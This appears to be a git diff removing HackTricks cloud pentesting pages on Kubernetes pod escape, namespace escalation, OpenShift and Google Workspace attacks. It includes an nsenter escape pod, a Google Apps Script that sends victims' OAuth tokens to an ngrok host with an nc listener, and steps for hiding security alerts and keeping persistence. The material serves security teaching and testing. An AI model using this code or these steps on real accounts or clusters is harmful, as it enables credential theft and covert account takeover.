- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -### Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -## Hardening Kubernetes / Automatic Tools - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - -## Manual Kubernetes Pentest - -### From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-services/" %} -[pentesting-kubernetes-services](pentesting-kubernetes-services/) -{% endcontent-ref %} - -### Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -### Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. 
You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="kubernetes-namespace-escalation.md" %} -[kubernetes-namespace-escalation.md](kubernetes-namespace-escalation.md) -{% endcontent-ref %} - -### From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="kubernetes-pivoting-to-clouds.md" %} -[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
deleted file mode 100644
index f913d5ccf..000000000
--- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# Pod Escape Privileges
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
deleted file mode 100644
index de5c06b84..000000000
--- a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# Kubernetes Namespace Escalation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -### Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/openshift-pentesting/README.md b/pentesting-cloud/openshift-pentesting/README.md
deleted file mode 100644
index 8be91bbad..000000000
--- a/pentesting-cloud/openshift-pentesting/README.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# OpenShift Pentesting
-
-## Basic Information
-
-{% content-ref url="openshift-basic-information.md" %}
-[openshift-basic-information.md](openshift-basic-information.md)
-{% endcontent-ref %}
-
-## Security Context Constraints
-
-{% content-ref url="openshift-scc.md" %}
-[openshift-scc.md](openshift-scc.md)
-{% endcontent-ref %}
-
-## Privilege Escalation
-
-{% content-ref url="openshift-privilege-escalation/" %}
-[openshift-privilege-escalation](openshift-privilege-escalation/)
-{% endcontent-ref %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
deleted file mode 100644
index 7e5040e3f..000000000
--- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# OpenShift - Privilege Escalation
-
-## Missing Service Account
-
-{% content-ref url="openshift-missing-service-account.md" %}
-[openshift-missing-service-account.md](openshift-missing-service-account.md)
-{% endcontent-ref %}
-
-## Tekton
-
-{% content-ref url="openshift-tekton.md" %}
-[openshift-tekton.md](openshift-tekton.md)
-{% endcontent-ref %}
-
-## SCC Bypass
-
-{% content-ref url="openshift-scc-bypass.md" %}
-[openshift-scc-bypass.md](openshift-scc-bypass.md)
-{% endcontent-ref %}
diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md
deleted file mode 100644
index f974d179b..000000000
--- a/pentesting-cloud/workspace-security/README.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# GWS - Workspace Pentesting
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Entry Points - -### Google Platforms and OAuth Apps Phishing - -Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -### Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address. - -## Post-Exploitation - -If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges: - -{% content-ref url="gws-post-exploitation.md" %} -[gws-post-exploitation.md](gws-post-exploitation.md) -{% endcontent-ref %} - -### GWS <-->GCP Pivoting - -Read more about the different techniques to pivot between GWS and GCP in: - -{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/) -{% endcontent-ref %} - -## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID) - -* **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC. -* **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. 
So, it might be possible to find it inside a domain server that would be synchronising users from time to time. -* **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -{% content-ref url="gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/" %} -[gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid](gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/) -{% endcontent-ref %} - -## Persistence - -If you have compromised some credentials or the session of the user check these options to maintain persistence over it: - -{% content-ref url="gws-persistence.md" %} -[gws-persistence.md](gws-persistence.md) -{% endcontent-ref %} - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Removed malicious synced smartphones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
deleted file mode 100644
index 09b6ffa5b..000000000
--- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
+++ /dev/null
@@ -1,273 +0,0 @@
-# GWS - App Scripts
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## App Scripts - -App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\ -They can also be set to be **executed every certain time** by the owner of the App Script (Persistence). - -### Create App Script - -There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**: - -
- -Create a container-bound project from Google Docs, Sheets, or Slides - -1. Open a Docs document, a Sheets spreadsheet, or Slides presentation. -2. Click **Extensions** > **Google Apps Script**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project - -To create a standalone project from Apps Script: - -1. Go to [`script.google.com`](https://script.google.com/). -2. Click add **New Project**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project from Google Drive - -1. Open [Google Drive](https://drive.google.com/). -2. Click **New** > **More** > **Google Apps Script**. - -
- -
- -Create a container-bound project from Google Forms - -1. Open a form in Google Forms. -2. Click More more\_vert > **Script editor**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project using the clasp command line tool - -`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal. - -See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details. - -
- -## App Script Scenario - -### Create Google Sheet with App Script - -Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**. - -### Leak token - -In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**: - -* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions) -* **Gmail**: To access gmail data -* **Drive**: To access drive data -* **Google Sheets API**: So it works with the trigger - -To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.** - -{% code overflow="wrap" %} -```javascript -function getToken() { - var userEmail = Session.getActiveUser().getEmail(); - var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1); - var oauthToken = ScriptApp.getOAuthToken(); - var identityToken = ScriptApp.getIdentityToken(); - - // Data json - data = { - "oauthToken": oauthToken, - "identityToken": identityToken, - "email": userEmail, - "domain": domain - } - - // Send data - makePostRequest(data); - - // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions - - // To ask for AdminDirectory permissions - var pageToken = ""; - page = AdminDirectory.Users.list({ - domain: domain, // Use the extracted domain - orderBy: 'givenName', - maxResults: 100, - pageToken: pageToken - }); - - // To ask for gmail permissions - var threads = GmailApp.getInboxThreads(0, 10); - - // To ask for drive permissions - var files = DriveApp.getFiles(); -} - - -function makePostRequest(data) { - var url = 'http://5.tcp.eu.ngrok.io:12027'; - - var options = { - 'method' : 'post', - 'contentType': 'application/json', - 'payload' : JSON.stringify(data) - }; - - try { - UrlFetchApp.fetch(url, options); - } catch (e) 
{ - Logger.log("Error making POST request: " + e.toString()); - } -} -``` -{% endcode %} - -To capture the request you can just run: - -```bash -ngrok tcp 4444 -nc -lv 4444 #macOS -``` - -Permissions requested to execute the App Script: - -
- -{% hint style="warning" %} -As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**. -{% endhint %} - -### Create Trigger - -Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save. - -Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something. - -### Sharing - -In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**. - -{% hint style="success" %} -The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users. -{% endhint %} - -### Abusing Shared With Me documents - -{% hint style="danger" %} -If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created). - -A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?) -{% endhint %} - -{% hint style="success" %} -If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created. 
-{% endhint %} - -### Copying instead of sharing - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:** - -
- -If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**. - -### Sharing as Web Application - -Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear: - -
- -Followed by the **typical OAuth prompt asking** for the needed permissions. - -### Testing - -You can test a gathered token to list emails with: - -{% code overflow="wrap" %} -```bash -curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \ --H "Authorization: Bearer " -``` -{% endcode %} - -List calendar of the user: - -```bash -curl -H "Authorization: Bearer $OAUTH_TOKEN" \ - -H "Accept: application/json" \ - "https://www.googleapis.com/calendar/v3/users/me/calendarList" -``` - -## App Script as Persistence - -One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.** - -It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**: - -Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you: - -
- -{% hint style="danger" %} -This will create a security alert email and a push message to your mobile alerting about this. -{% endhint %} - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. -{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags). -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md
deleted file mode 100644
index d4b446fd1..000000000
--- a/pentesting-cloud/workspace-security/gws-persistence.md
+++ /dev/null
@@ -1,210 +0,0 @@
-# GWS - Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -{% hint style="danger" %} -All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account. -{% endhint %} - -## **Persistence in Gmail** - -* You can create **filters to hide** security notifications from Google - * `from: (no-reply@accounts.google.com) "Security Alert"` - * This will prevent security emails to reach the email (but won't prevent push notifications to the mobile) - -
- -Steps to create a gmail filter - -(Instructions from [**here**](https://support.google.com/mail/answer/6579)) - -1. Open [Gmail](https://mail.google.com/). -2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) . -3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**. -4. At the bottom of the search window, click **Create filter**. -5. Choose what you’d like the filter to do. -6. Click **Create filter**. - -Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters) - -
- -
- -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop) - * The receiving address will need to confirm this - * Then, set to forward all the emails while keeping a copy (remember to click on save changes): - -
- -It's also possible create filters and forward only specific emails to the other email address. - -## App passwords - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.** - -**Even if you have an open session you will need to know the password of the user to create an app password.** - -{% hint style="info" %} -App passwords can **only be used with accounts that have 2-Step Verification** turned on. -{% endhint %} - -## Change 2-FA and similar - -It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\ -**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).** - -{% hint style="danger" %} -To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here. - -It's also possible to **locate the device.** -{% endhint %} - -**Even if you have an open session you will need to know the password of the user to change these settings.** - -## Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. 
The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\ -It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -Check the following page for more information about OAuth Apps: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -## Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled). - -
- -If you are a Workspace admin check this to enable the feature - -(Information [copied form the docs](https://support.google.com/a/answer/7223765)) - -As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can: - -* Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf. -* Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account. - -Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit. - -#### Delegation limits & restrictions - -* **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account. -* With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number. -* Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently. -* A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit. -* Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609). 
